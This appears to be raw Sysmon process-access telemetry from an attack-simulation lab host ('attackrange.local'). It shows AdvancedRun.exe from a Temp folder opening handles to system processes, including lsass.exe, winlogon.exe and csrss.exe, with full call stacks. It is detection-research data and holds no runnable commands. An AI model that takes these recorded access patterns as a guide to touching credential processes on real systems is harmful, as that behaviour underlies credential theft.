18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004015402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004015401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 